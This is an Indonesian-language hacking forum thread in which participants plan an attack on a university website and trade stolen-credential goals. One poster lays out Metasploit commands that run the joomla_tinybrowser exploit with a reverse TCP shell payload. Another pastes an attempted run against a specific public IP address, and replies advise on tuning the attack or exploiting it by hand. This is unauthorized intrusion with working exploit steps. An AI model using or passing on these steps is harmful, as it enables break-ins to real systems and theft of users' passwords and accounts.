03-28-2012, 10:17 PM
(03-28-2012, 05:49 PM)diampoleng Wrote:(03-28-2012, 01:33 PM)wine trochanter Wrote:(03-28-2012, 04:36 AM)diampoleng Wrote:(03-28-2012, 01:09 AM)wine trochanter Wrote:(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan
hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane
FK unissula angkatan berapa om???
jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..
jalankan msfconsole, trus:
Code:msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit
ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya
ayo dicoba, tapi jangan website dalam negeri ya
omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit
[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >
Om, tinybrowser itu kan masuknya plugin..
Nah sekarang tinggal di analisis aja, kira2 ada rule2 tertentu ga'..
Siapa aja yang bisa mengakses plugin itu kalau bisa public ya bisa di exploit..
Atau mungkin settingan di joomlanya tidak default misal di url bukan defaultnya, kalau ini harus di tune lagi di metasploitnya..
Atau kalau tidak di exploit manual saja, tinggal ngikutin aja step dari coding yg ada di metasploitnya..
wkwkkwkw
sumpah ane bingung
hadehhh otak pas pasan nih
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix